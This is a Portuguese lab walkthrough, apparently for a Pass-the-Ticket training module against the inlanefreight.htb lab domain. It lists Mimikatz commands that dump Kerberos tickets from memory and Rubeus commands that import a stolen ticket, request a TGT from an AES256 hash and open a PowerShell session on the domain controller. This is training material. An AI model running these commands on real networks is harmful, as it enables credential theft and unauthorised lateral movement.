Questions

1. Conecte-se à máquina de destino usando RDP e as credenciais fornecidas. Exporte todos os tickets presentes no computador. Quantos tickets de usuário (TGT) você coletou

• Podemos coletar todos os tickets de um sistema usando o Mimikatz com o módulo sekurlsa::tickets /export

mimikatz.exe
privilege::debug
sekurlsa::tickets /export
exii
dir *.kirbi

---

1. Use o TGT de John para realizar um ataque Pass the Ticket e recuperar a flag da pasta compartilhada \DC01.inlanefreight.htb\john

• Vamos importar o ticket para a sessão atual usando o .kirbi arquivo do disco.

Rubeus.exe ptt /ticket:[0;944d6]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi

---

1. Use o TGT de John para realizar um ataque Pass the Ticket e conectar-se ao DC01 usando o PowerShell Remoting. Leia o sinalizador de C:\john\john.txt

Rubeus - PowerShell Remoting with Pass the Ticket

• Crie um processo sacrificial com Rubeus

Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show

• O comando acima abrirá uma nova janela do cmd. A partir dessa janela, podemos executar o Rubeus para solicitar um novo TGT com a opção /pttde importar o ticket para nossa sessão atual e conectar ao DC usando o PowerShell Remoting.

Rubeus - Passe o bilhete para movimento lateral

Rubeus.exe asktgt /user:john /domain:inlanefreight.htb /aes256:<hash> /ptt
powershell
Enter-PSSession -ComputerName DC01